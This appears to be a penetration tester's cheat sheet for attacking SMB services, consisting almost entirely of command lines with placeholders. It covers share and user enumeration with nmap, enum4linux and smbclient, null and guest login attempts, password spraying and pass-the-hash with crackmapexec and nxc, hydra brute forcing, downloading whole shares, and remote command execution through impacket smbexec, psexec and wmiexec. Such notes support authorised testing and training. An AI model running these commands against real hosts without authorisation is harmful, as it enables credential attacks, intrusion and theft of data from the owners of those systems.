sudo nmap -p 139,445 -sV -Pn <IP>
tcpdump -i tun0 port <Port> and src <IP> -s0 -A -n 2>/dev/null & crackmapexec smb <IP> --shares --port <Port> 1>/dev/null 2>/dev/null
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script "smb-vuln*" -p 139,445 <IP>
enum4linux -a <IP>
enum4linux -a <IP> -u <username> -p <password>
Null Session: smbclient -N -L \\\\<IP>
Listing share contents: smbclient -L \\\\<IP>\\
Connecting to share: smbclient \\\\<IP>\\<share>\\ -U [domain\]<username>
Listing share permissions: smbmap -H <IP>
Download target file: smbget smb://<IP>//<share>/<file> [--user <username%password>]
Download target share: smbget -R smb://<IP>//<share>
crackmapexec smb <IP> [--users | --shares]
Null/Guest Logins
crackmapexec smb <IP> --shares -u ' ' -p ''
crackmapexec smb <IP> --shares -u '' -p ''
crackmapexec smb <IP> -u ' ' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
Checking authentication
crackmapexec smb <IP> -u <user> -p <pass> --local-auth
crackmapexec smb <IP> -u <user> -p <pass>
nxc smb <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc smb <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success
impacket-smbexec [domain/]<username>[:password]@<IP>
impacket-psexec [domain/]<username>[:password]@<IP>
impacket-wmiexec [domain/]<username>[:password]@<IP>
hydra -L <users list> -P <password list> -f smb://<IP> [-p <port>]
hydra -l <username> -p <password> -f smb://<IP> [-p <port>]
